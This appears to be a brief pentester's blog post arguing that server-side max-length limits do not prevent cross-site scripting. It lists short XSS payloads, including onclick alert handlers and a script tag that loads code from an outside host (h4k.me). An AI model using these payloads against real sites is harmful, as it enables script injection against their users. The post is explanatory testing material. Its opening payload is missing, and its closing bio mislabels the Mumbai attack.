While performing penetration testing, there was a text field which was not accepting more than 20 characters(server side validation). I inserted following piece of code to check XSS (From RSnake’s XSS cheat sheet):


and verified the source for <XSS verses &lt;XSS . As<XSS  was in the source,  the field in the context was vulnerable to cross site scripting.

Then I tried hard to create/find some script which should be less than or equal to 20 characters and could be executed on this field to confirm the XSS but I was not able to find anything. At that time a thought came into my mind that could we consider max-length validation also a mitigation for XSS and see the irony that as soon as I asked this question IT Security stack-exchange forum, I found the scripts which can be used to verify XSS on a field which has max-length server side validation and those scripts have been provided below.

So max-length validation cannot mitigate XSS attacks.

<a href=http://a.by> <a onclick=alert(2)> <b onclick=alert(2)> <script src=//h4k.me

hackingLife was moving on its path and suddenly a torment came. I was standing      there with my eyes closed feeling all the blows and was trying to look for the  way to the destination. Damage had been done. Destinations had been made  blur, barely visible and I had to walk. Now when I am aimless, I still have  some vivid memories of my dreams and here I will try to put them in  sequence. Lets see if  I can find myself again and complete the jigsaw-puzzle.

Whatever I will read/learn/hear/know, I will try to put them here together  (mostly about the web and the security, the two alcohols I love most).

To start with security I will quote what Mr. P. Chidambaram, the honorable home minister of India had quoted after Mumbai 9/11 attack:

"We are secure because of the God and the Destiny"

Remember it! You’re gonna hear it from me more often and then.